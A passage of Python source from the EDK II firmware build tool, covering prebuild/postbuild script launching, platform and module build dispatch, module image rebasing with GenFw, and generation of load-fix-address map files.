self.Prebuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
def InitPostBuild(self):
if 'POSTBUILD' in GlobalData.gCommandLineDefines:
self.Postbuild = GlobalData.gCommandLineDefines.get('POSTBUILD')
else:
Platform = self.Db._MapPlatform(str(self.PlatformFile))
self.Postbuild = str(Platform.Postbuild)
if self.Postbuild:
PostbuildList = []
#
# Evaluate all arguments and convert arguments that are WORKSPACE
# relative paths to absolute paths. Filter arguments that look like
# flags or do not follow the file/dir naming rules to avoid false
# positives on this conversion.
#
for Arg in self.Postbuild.split():
#
# Do not modify Arg if it looks like a flag or an absolute file path
#
if Arg.startswith('-') or os.path.isabs(Arg):
PostbuildList.append(Arg)
continue
#
# Do not modify Arg if it does not look like a Workspace relative
# path that starts with a valid package directory name
#
if not Arg[0].isalpha() or os.path.dirname(Arg) == '':
PostbuildList.append(Arg)
continue
#
# If Arg looks like a WORKSPACE relative path, then convert to an
# absolute path and check to see if the file exists.
#
Temp = mws.join(self.WorkspaceDir, Arg)
if os.path.isfile(Temp):
Arg = Temp
PostbuildList.append(Arg)
self.Postbuild = ' '.join(PostbuildList)
self.Postbuild += self.PassCommandOption(self.BuildTargetList, self.ArchList, self.ToolChainList, self.PlatformFile, self.Target)
def PassCommandOption(self, BuildTarget, TargetArch, ToolChain, PlatformFile, Target):
BuildStr = ''
if GlobalData.gCommand and isinstance(GlobalData.gCommand, list):
BuildStr += ' ' + ' '.join(GlobalData.gCommand)
TargetFlag = False
ArchFlag = False
ToolChainFlag = False
PlatformFileFlag = False
if GlobalData.gOptions and not GlobalData.gOptions.BuildTarget:
TargetFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.TargetArch:
ArchFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.ToolChain:
ToolChainFlag = True
if GlobalData.gOptions and not GlobalData.gOptions.PlatformFile:
PlatformFileFlag = True
if TargetFlag and BuildTarget:
if isinstance(BuildTarget, list) or isinstance(BuildTarget, tuple):
BuildStr += ' -b ' + ' -b '.join(BuildTarget)
elif isinstance(BuildTarget, str):
BuildStr += ' -b ' + BuildTarget
if ArchFlag and TargetArch:
if isinstance(TargetArch, list) or isinstance(TargetArch, tuple):
BuildStr += ' -a ' + ' -a '.join(TargetArch)
elif isinstance(TargetArch, str):
BuildStr += ' -a ' + TargetArch
if ToolChainFlag and ToolChain:
if isinstance(ToolChain, list) or isinstance(ToolChain, tuple):
BuildStr += ' -t ' + ' -t '.join(ToolChain)
elif isinstance(ToolChain, str):
BuildStr += ' -t ' + ToolChain
if PlatformFileFlag and PlatformFile:
if isinstance(PlatformFile, list) or isinstance(PlatformFile, tuple):
BuildStr += ' -p ' + ' -p '.join(PlatformFile)
elif isinstance(PlatformFile, str):
BuildStr += ' -p' + PlatformFile
BuildStr += ' --conf=' + GlobalData.gConfDirectory
if Target:
BuildStr += ' ' + Target
return BuildStr
def LaunchPrebuild(self):
if self.Prebuild:
EdkLogger.info("\n- Prebuild Start -\n")
self.LaunchPrebuildFlag = True
#
# The purpose of .PrebuildEnv file is capture environment variable settings set by the prebuild script
# and preserve them for the rest of the main build step, because the child process environment will
# evaporate as soon as it exits, we cannot get it in build step.
#
PrebuildEnvFile = os.path.join(GlobalData.gConfDirectory, '.cache', '.PrebuildEnv')
if os.path.isfile(PrebuildEnvFile):
os.remove(PrebuildEnvFile)
if os.path.isfile(self.PlatformBuildPath):
os.remove(self.PlatformBuildPath)
if sys.platform == "win32":
args = ' && '.join((self.Prebuild, 'set > ' + PrebuildEnvFile))
Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
else:
args = ' && '.join((self.Prebuild, 'env > ' + PrebuildEnvFile))
Process = Popen(args, stdout=PIPE, stderr=PIPE, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Process.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Process.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Process.wait()
if Process.stdout:
StdOutThread.join()
if Process.stderr:
StdErrThread.join()
if Process.returncode != 0 :
EdkLogger.error("Prebuild", PREBUILD_ERROR, 'Prebuild process is not success!')
if os.path.exists(PrebuildEnvFile):
f = open(PrebuildEnvFile)
envs = f.readlines()
f.close()
envs = itertools.imap(lambda l: l.split('=', 1), envs)
envs = itertools.ifilter(lambda l: len(l) == 2, envs)
envs = itertools.imap(lambda l: [i.strip() for i in l], envs)
os.environ.update(dict(envs))
EdkLogger.info("\n- Prebuild Done -\n")
def LaunchPostbuild(self):
if self.Postbuild:
EdkLogger.info("\n- Postbuild Start -\n")
if sys.platform == "win32":
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
else:
Process = Popen(self.Postbuild, stdout=PIPE, stderr=PIPE, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Process.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Process.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Process.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Process.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Process.wait()
if Process.stdout:
StdOutThread.join()
if Process.stderr:
StdErrThread.join()
if Process.returncode != 0 :
EdkLogger.error("Postbuild", POSTBUILD_ERROR, 'Postbuild process is not success!')
EdkLogger.info("\n- Postbuild Done -\n")
## Build a module or platform
#
# Create autogen code and makefile for a module or platform, and the launch
# "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
def _BuildPa(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False, FfsCommand={}):
if AutoGenObject is None:
return False
# skip file generation for cleanxxx targets, run and fds target
if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or Target == 'genc':
self.Progress.Start("Generating code")
AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
self.Progress.Stop("done!")
if Target == "genc":
return True
if not self.SkipAutoGen or Target == 'genmake':
self.Progress.Start("Generating makefile")
AutoGenObject.CreateMakeFile(CreateDepsMakeFile, FfsCommand)
self.Progress.Stop("done!")
if Target == "genmake":
return True
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(False)
AutoGenObject.CreateMakeFile(False)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand is None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
makefile = GenMake.BuildFile(AutoGenObject)._FILE_NAME_[GenMake.gMakeType]
# run
if Target == 'run':
RunDir = os.path.normpath(os.path.join(AutoGenObject.BuildDir, GlobalData.gGlobalDefines['ARCH']))
Command = '.\SecMain'
os.chdir(RunDir)
LaunchCommand(Command, RunDir)
return True
# build modules
if BuildModule:
BuildCommand = BuildCommand + [Target]
LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# build library
if Target == 'libraries':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# build module
if Target == 'modules':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Lib, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
for Mod in AutoGenObject.ModuleBuildDirectoryList:
NewBuildCommand = BuildCommand + ['-f', os.path.normpath(os.path.join(Mod, makefile)), 'pbuild']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# cleanlib
if Target == 'cleanlib':
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# clean
if Target == 'clean':
for Mod in AutoGenObject.ModuleBuildDirectoryList:
ModMakefile = os.path.normpath(os.path.join(Mod, makefile))
if os.path.exists(ModMakefile):
NewBuildCommand = BuildCommand + ['-f', ModMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
for Lib in AutoGenObject.LibraryBuildDirectoryList:
LibMakefile = os.path.normpath(os.path.join(Lib, makefile))
if os.path.exists(LibMakefile):
NewBuildCommand = BuildCommand + ['-f', LibMakefile, 'cleanall']
LaunchCommand(NewBuildCommand, AutoGenObject.MakeFileDir)
return True
# cleanall
if Target == 'cleanall':
try:
#os.rmdir(AutoGenObject.BuildDir)
RemoveDirectory(AutoGenObject.BuildDir, True)
except WindowsError as X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
## Build a module or platform
#
# Create autogen code and makefile for a module or platform, and the launch
# "make" command to build it
#
# @param Target The target of build command
# @param Platform The platform file
# @param Module The module file
# @param BuildTarget The name of build target, one of "DEBUG", "RELEASE"
# @param ToolChain The name of toolchain to build
# @param Arch The arch of the module/platform
# @param CreateDepModuleCodeFile Flag used to indicate creating code
# for dependent modules/Libraries
# @param CreateDepModuleMakeFile Flag used to indicate creating makefile
# for dependent modules/Libraries
#
def _Build(self, Target, AutoGenObject, CreateDepsCodeFile=True, CreateDepsMakeFile=True, BuildModule=False):
if AutoGenObject is None:
return False
# skip file generation for cleanxxx targets, run and fds target
if Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or Target == 'genc':
self.Progress.Start("Generating code")
AutoGenObject.CreateCodeFile(CreateDepsCodeFile)
self.Progress.Stop("done!")
if Target == "genc":
return True
if not self.SkipAutoGen or Target == 'genmake':
self.Progress.Start("Generating makefile")
AutoGenObject.CreateMakeFile(CreateDepsMakeFile)
#AutoGenObject.CreateAsBuiltInf()
self.Progress.Stop("done!")
if Target == "genmake":
return True
else:
# always recreate top/platform makefile when clean, just in case of inconsistency
AutoGenObject.CreateCodeFile(False)
AutoGenObject.CreateMakeFile(False)
if EdkLogger.GetLevel() == EdkLogger.QUIET:
EdkLogger.quiet("Building ... %s" % repr(AutoGenObject))
BuildCommand = AutoGenObject.BuildCommand
if BuildCommand is None or len(BuildCommand) == 0:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(AutoGenObject.BuildTarget, AutoGenObject.ToolChain, AutoGenObject.Arch),
ExtraData=str(AutoGenObject))
# build modules
if BuildModule:
if Target != 'fds':
BuildCommand = BuildCommand + [Target]
AutoGenObject.BuildTime = LaunchCommand(BuildCommand, AutoGenObject.MakeFileDir)
self.CreateAsBuiltInf()
return True
# genfds
if Target == 'fds':
LaunchCommand(AutoGenObject.GenFdsCommand, AutoGenObject.MakeFileDir)
return True
# run
if Target == 'run':
RunDir = os.path.normpath(os.path.join(AutoGenObject.BuildDir, GlobalData.gGlobalDefines['ARCH']))
Command = '.\SecMain'
os.chdir(RunDir)
LaunchCommand(Command, RunDir)
return True
# build library
if Target == 'libraries':
pass
# not build modules
# cleanall
if Target == 'cleanall':
try:
#os.rmdir(AutoGenObject.BuildDir)
RemoveDirectory(AutoGenObject.BuildDir, True)
except WindowsError as X:
EdkLogger.error("build", FILE_DELETE_FAILURE, ExtraData=str(X))
return True
## Rebase module image and Get function address for the input module list.
#
def _RebaseModule (self, MapBuffer, BaseAddress, ModuleList, AddrIsOffset = True, ModeIsSmm = False):
if ModeIsSmm:
AddrIsOffset = False
for InfFile in ModuleList:
sys.stdout.write (".")
sys.stdout.flush()
ModuleInfo = ModuleList[InfFile]
ModuleName = ModuleInfo.BaseName
ModuleOutputImage = ModuleInfo.Image.FileName
ModuleDebugImage = os.path.join(ModuleInfo.DebugDir, ModuleInfo.BaseName + '.efi')
## for SMM module in SMRAM, the SMRAM will be allocated from base to top.
if not ModeIsSmm:
BaseAddress = BaseAddress - ModuleInfo.Image.Size
#
# Update Image to new BaseAddress by GenFw tool
#
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--rebase", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
else:
#
# Set new address to the section header only for SMM driver.
#
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleOutputImage], ModuleInfo.OutputDir)
LaunchCommand(["GenFw", "--address", str(BaseAddress), "-r", ModuleDebugImage], ModuleInfo.DebugDir)
#
# Collect funtion address from Map file
#
ImageMapTable = ModuleOutputImage.replace('.efi', '.map')
FunctionList = []
if os.path.exists(ImageMapTable):
OrigImageBaseAddress = 0
ImageMap = open(ImageMapTable, 'r')
for LinStr in ImageMap:
if len (LinStr.strip()) == 0:
continue
#
# Get the preferred address set on link time.
#
if LinStr.find ('Preferred load address is') != -1:
StrList = LinStr.split()
OrigImageBaseAddress = int (StrList[len(StrList) - 1], 16)
StrList = LinStr.split()
if len (StrList) > 4:
if StrList[3] == 'f' or StrList[3] == 'F':
Name = StrList[1]
RelativeAddress = int (StrList[2], 16) - OrigImageBaseAddress
FunctionList.append ((Name, RelativeAddress))
if ModuleInfo.Arch == 'IPF' and Name.endswith('_ModuleEntryPoint'):
#
# Get the real entry point address for IPF image.
#
ModuleInfo.Image.EntryPoint = RelativeAddress
ImageMap.close()
#
# Add general information.
#
if ModeIsSmm:
MapBuffer.write('\n\n%s (Fixed SMRAM Offset, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
elif AddrIsOffset:
MapBuffer.write('\n\n%s (Fixed Memory Offset, BaseAddress=-0x%010X, EntryPoint=-0x%010X)\n' % (ModuleName, 0 - BaseAddress, 0 - (BaseAddress + ModuleInfo.Image.EntryPoint)))
else:
MapBuffer.write('\n\n%s (Fixed Memory Address, BaseAddress=0x%010X, EntryPoint=0x%010X)\n' % (ModuleName, BaseAddress, BaseAddress + ModuleInfo.Image.EntryPoint))
#
# Add guid and general seciton section.
#
TextSectionAddress = 0
DataSectionAddress = 0
for SectionHeader in ModuleInfo.Image.SectionHeaderList:
if SectionHeader[0] == '.text':
TextSectionAddress = SectionHeader[1]
elif SectionHeader[0] in ['.data', '.sdata']:
DataSectionAddress = SectionHeader[1]
if AddrIsOffset:
MapBuffer.write('(GUID=%s, .textbaseaddress=-0x%010X, .databaseaddress=-0x%010X)\n' % (ModuleInfo.Guid, 0 - (BaseAddress + TextSectionAddress), 0 - (BaseAddress + DataSectionAddress)))
else:
MapBuffer.write('(GUID=%s, .textbaseaddress=0x%010X, .databaseaddress=0x%010X)\n' % (ModuleInfo.Guid, BaseAddress + TextSectionAddress, BaseAddress + DataSectionAddress))
#
# Add debug image full path.
#
MapBuffer.write('(IMAGE=%s)\n\n' % (ModuleDebugImage))
#
# Add funtion address
#
for Function in FunctionList:
if AddrIsOffset:
MapBuffer.write(' -0x%010X %s\n' % (0 - (BaseAddress + Function[1]), Function[0]))
else:
MapBuffer.write(' 0x%010X %s\n' % (BaseAddress + Function[1], Function[0]))
ImageMap.close()
#
# for SMM module in SMRAM, the SMRAM will be allocated from base to top.
#
if ModeIsSmm:
BaseAddress = BaseAddress + ModuleInfo.Image.Size
## Collect MAP information of all FVs
#
def _CollectFvMapBuffer (self, MapBuffer, Wa, ModuleList):
if self.Fdf:
# First get the XIP base address for FV map file.
GuidPattern = re.compile("[-a-fA-F0-9]+")
GuidName = re.compile("\(GUID=[-a-fA-F0-9]+")
for FvName in Wa.FdfProfile.FvDict:
FvMapBuffer = os.path.join(Wa.FvDir, FvName + '.Fv.map')
if not os.path.exists(FvMapBuffer):
continue
FvMap = open(FvMapBuffer, 'r')
#skip FV size information
FvMap.readline()
FvMap.readline()
FvMap.readline()
FvMap.readline()
for Line in FvMap:
MatchGuid = GuidPattern.match(Line)
if MatchGuid is not None:
#
# Replace GUID with module name
#
GuidString = MatchGuid.group()
if GuidString.upper() in ModuleList:
Line = Line.replace(GuidString, ModuleList[GuidString.upper()].Name)
MapBuffer.write(Line)
#
# Add the debug image full path.
#
MatchGuid = GuidName.match(Line)
if MatchGuid is not None:
GuidString = MatchGuid.group().split("=")[1]
if GuidString.upper() in ModuleList:
MapBuffer.write('(IMAGE=%s)\n' % (os.path.join(ModuleList[GuidString.upper()].DebugDir, ModuleList[GuidString.upper()].Name + '.efi')))
FvMap.close()
## Collect MAP information of all modules
#
def _CollectModuleMapBuffer (self, MapBuffer, ModuleList):
sys.stdout.write ("Generate Load Module At Fix Address Map")
sys.stdout.flush()
PatchEfiImageList = []
PeiModuleList = {}
BtModuleList = {}
RtModuleList = {}
SmmModuleList = {}
PeiSize = 0
BtSize = 0
RtSize = 0
# reserve 4K size in SMRAM to make SMM module address not from 0.
SmmSize = 0x1000
IsIpfPlatform = False
if 'IPF' in self.ArchList:
IsIpfPlatform = True
for ModuleGuid in ModuleList:
Module = ModuleList[ModuleGuid]
GlobalData.gProcessingFile = "%s [%s, %s, %s]" % (Module.MetaFile, Module.Arch, Module.ToolChain, Module.BuildTarget)
OutputImageFile = ''
for ResultFile in Module.CodaTargetList:
if str(ResultFile.Target).endswith('.efi'):
#
# module list for PEI, DXE, RUNTIME and SMM
#
OutputImageFile = os.path.join(Module.OutputDir, Module.Name + '.efi')
ImageClass = PeImageClass (OutputImageFile)
if not ImageClass.IsValid:
EdkLogger.error("build", FILE_PARSE_FAILURE, ExtraData=ImageClass.ErrorInfo)
ImageInfo = PeImageInfo(Module.Name, Module.Guid, Module.Arch, Module.OutputDir, Module.DebugDir, ImageClass)
if Module.ModuleType in [SUP_MODULE_PEI_CORE, SUP_MODULE_PEIM, EDK_COMPONENT_TYPE_COMBINED_PEIM_DRIVER, EDK_COMPONENT_TYPE_PIC_PEIM, EDK_COMPONENT_TYPE_RELOCATABLE_PEIM, SUP_MODULE_DXE_CORE]:
PeiModuleList[Module.MetaFile] = ImageInfo
PeiSize += ImageInfo.Image.Size
elif Module.ModuleType in [EDK_COMPONENT_TYPE_BS_DRIVER, SUP_MODULE_DXE_DRIVER, SUP_MODULE_UEFI_DRIVER]:
BtModuleList[Module.MetaFile] = ImageInfo
BtSize += ImageInfo.Image.Size
elif Module.ModuleType in [SUP_MODULE_DXE_RUNTIME_DRIVER, EDK_COMPONENT_TYPE_RT_DRIVER, SUP_MODULE_DXE_SAL_DRIVER, EDK_COMPONENT_TYPE_SAL_RT_DRIVER]:
RtModuleList[Module.MetaFile] = ImageInfo
#IPF runtime driver needs to be at 2 page alignment.
if IsIpfPlatform and ImageInfo.Image.Size % 0x2000 != 0:
ImageInfo.Image.Size = (ImageInfo.Image.Size / 0x2000 + 1) * 0x2000
RtSize += ImageInfo.Image.Size
elif Module.ModuleType in [SUP_MODULE_SMM_CORE, SUP_MODULE_DXE_SMM_DRIVER, SUP_MODULE_MM_STANDALONE, SUP_MODULE_MM_CORE_STANDALONE]:
SmmModuleList[Module.MetaFile] = ImageInfo
SmmSize += ImageInfo.Image.Size
if Module.ModuleType == SUP_MODULE_DXE_SMM_DRIVER:
PiSpecVersion = Module.Module.Specification.get('PI_SPECIFICATION_VERSION', '0x00000000')
# for PI specification < PI1.1, DXE_SMM_DRIVER also runs as BOOT time driver.
if int(PiSpecVersion, 16) < 0x0001000A:
BtModuleList[Module.MetaFile] = ImageInfo
BtSize += ImageInfo.Image.Size
break
#
# EFI image is final target.
# Check EFI image contains patchable FixAddress related PCDs.
#
if OutputImageFile != '':
ModuleIsPatch = False
for Pcd in Module.ModulePcdList:
if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SET:
ModuleIsPatch = True
break
if not ModuleIsPatch:
for Pcd in Module.LibraryPcdList:
if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SET:
ModuleIsPatch = True
break
if not ModuleIsPatch:
continue
#
# Module includes the patchable load fix address PCDs.
# It will be fixed up later.
#
PatchEfiImageList.append (OutputImageFile)
#
# Get Top Memory address
#
ReservedRuntimeMemorySize = 0
TopMemoryAddress = 0
if self.LoadFixAddress == 0xFFFFFFFFFFFFFFFF:
TopMemoryAddress = 0
else:
TopMemoryAddress = self.LoadFixAddress
if TopMemoryAddress < RtSize + BtSize + PeiSize:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS is too low to load driver")
# Make IPF runtime driver at 2 page alignment.
if IsIpfPlatform:
ReservedRuntimeMemorySize = TopMemoryAddress % 0x2000
RtSize = RtSize + ReservedRuntimeMemorySize
#
# Patch FixAddress related PCDs into EFI image
#
for EfiImage in PatchEfiImageList:
EfiImageMap = EfiImage.replace('.efi', '.map')
if not os.path.exists(EfiImageMap):
continue
#
# Get PCD offset in EFI image by GenPatchPcdTable function
#
PcdTable = parsePcdInfoFromMapFile(EfiImageMap, EfiImage)
#
# Patch real PCD value by PatchPcdValue tool
#
for PcdInfo in PcdTable:
ReturnValue = 0
if PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE_DATA_TYPE, str (PeiSize / 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE_DATA_TYPE, str (BtSize / 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE_DATA_TYPE, str (RtSize / 0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE and len (SmmModuleList) > 0:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE_DATA_TYPE, str (SmmSize / 0x1000))
if ReturnValue != 0:
EdkLogger.error("build", PARAMETER_INVALID, "Patch PCD value failed", ExtraData=ErrorInfo)
MapBuffer.write('PEI_CODE_PAGE_NUMBER = 0x%x\n' % (PeiSize / 0x1000))
MapBuffer.write('BOOT_CODE_PAGE_NUMBER = 0x%x\n' % (BtSize / 0x1000))
MapBuffer.write('RUNTIME_CODE_PAGE_NUMBER = 0x%x\n' % (RtSize / 0x1000))
if len (SmmModuleList) > 0:
MapBuffer.write('SMM_CODE_PAGE_NUMBER = 0x%x\n' % (SmmSize / 0x1000))
PeiBaseAddr = TopMemoryAddress - RtSize - BtSize
BtBaseAddr = TopMemoryAddress - RtSize
RtBaseAddr = TopMemoryAddress - ReservedRuntimeMemorySize
self._RebaseModule (MapBuffer, PeiBaseAddr, PeiModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, BtBaseAddr, BtModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, RtBaseAddr, RtModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, 0x1000, SmmModuleList, AddrIsOffset=False, ModeIsSmm=True)
MapBuffer.write('\n\n')
sys.stdout.write ("\n")
sys.stdout.flush()
## Save platform Map file
#
def _SaveMapFile (self, MapBuffer, Wa):
#
# Map file path is got.
#
MapFilePath = os.path.join(Wa.BuildDir, Wa.Name + '.map')
#
# Save address map into MAP file.
#
SaveFileOnChange(MapFilePath, MapBuffer.getvalue(), False)
MapBuffer.close()
if self.LoadFixAddress != 0:
sys.stdout.write ("\nLoad Module At Fix Address Map file can be found at %s\n" % (MapFilePath))
sys.stdout.flush()
## Build active platform for different build targets and different tool chains
#
def _BuildPlatform(self):
SaveFileOnChange(self.PlatformBuildPath, '# DO NOT EDIT \n# FILE auto-generated\n', False)
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
self.BuildReport.AddPlatformReport(Wa)
self.Progress.Stop("done!")
# Add ffs build to makefile
CmdListDict = {}
if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
CmdListDict = self._GenFfsCmd()
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
for Module in Pa.Platform.Modules:
# Get ModuleAutoGen object to generate C code file and makefile
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma is None:
continue
self.BuildModules.append(Ma)
self._BuildPa(self.Target, Pa, FfsCommand=CmdListDict)
# Create MAP file when Load Fix Address is enabled.
if self.Target in ["", "all", "fds"]:
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platform with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma is None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
MapBuffer = BytesIO('')
if self.LoadFixAddress != 0:
#
# Rebase module to the preferred memory address before GenFds
#
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
if self.Fdf:
#
# create FDS again for the updated EFI image
#
self._Build("fds", Wa)
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile (MapBuffer, Wa)
## Build active module for different build targets, different tool chains and different archs
#
def _BuildModule(self):
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
index = 0
for ToolChain in self.ToolChainList:
WorkspaceAutoGenTime = time.time()
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
GlobalData.gGlobalDefines['FAMILY'] = self.ToolChainFamily[index]
index += 1
#
# module build needs platform build information, so get platform
# AutoGen first
#
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress,
self.ModuleFile
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
Wa.CreateMakeFile(False)
# Add ffs build to makefile
CmdListDict = None
if GlobalData.gEnableGenfdsMultiThread and self.Fdf:
CmdListDict = self._GenFfsCmd()
self.Progress.Stop("done!")
MaList = []
ExitFlag = threading.Event()
ExitFlag.clear()
self.AutoGenTime += int(round((time.time() - WorkspaceAutoGenTime)))
for Arch in Wa.ArchList:
AutoGenStart = time.time()
GlobalData.gGlobalDefines['ARCH'] = Arch
